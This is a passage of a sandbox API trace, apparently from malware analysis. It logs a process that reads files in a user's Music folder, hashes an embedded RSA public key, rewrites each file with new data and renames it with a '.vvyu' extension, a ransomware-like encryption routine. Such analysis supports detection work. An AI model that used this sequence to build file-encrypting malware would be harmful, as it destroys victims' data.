(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68c0 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6860 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6830 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea968 | out: hHeap=0x2c0000) returned 1 [0197.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.879] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x135dc, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x135dc, lpOverlapped=0x0) returned 1 [0197.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.880] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x135e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.880] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.885] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.886] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.886] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.886] CloseHandle (hObject=0x584) returned 1 [0197.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0197.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0197.889] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\f09xVKn7RNmgc_bZZ.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\f09xvkn7rnmgc_bzz.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\f09xVKn7RNmgc_bZZ.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\f09xvkn7rnmgc_bzz.m4a.vvyu")) returned 1 [0197.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.891] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0197.895] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e12b60, ftCreationTime.dwHighDateTime=0x1d89fab, ftLastAccessTime.dwLowDateTime=0xc75fbe80, ftLastAccessTime.dwHighDateTime=0x1d8a13c, ftLastWriteTime.dwLowDateTime=0xc75fbe80, ftLastWriteTime.dwHighDateTime=0x1d8a13c, nFileSizeHigh=0x0, nFileSizeLow=0x6ef9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LPB-FW9jvpM0h.wav", cAlternateFileName="LPB-FW~1.WAV")) returned 1 [0197.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0197.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.895] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\LPB-FW9jvpM0h.wav") returned=".wav" [0197.895] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\LPB-FW9jvpM0h.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\lpb-fw9jvpm0h.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.898] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=28409) returned 1 [0197.898] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.903] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6ed3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.903] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.912] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.912] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x6ef9, lpOverlapped=0x0) returned 1 [0197.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.913] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0197.914] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.914] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.914] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.914] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.914] GetLastError () returned 0x0 [0197.914] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.914] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0197.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.915] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.915] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.915] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6f00) returned 0x2af5168 [0197.915] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea968 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea9b0 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0197.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0197.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.917] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0197.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6860 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6848 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0197.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.921] GetCurrentThreadId () returned 0x5d8 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2c90 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.922] GetCurrentThreadId () returned 0x5d8 [0197.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0197.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 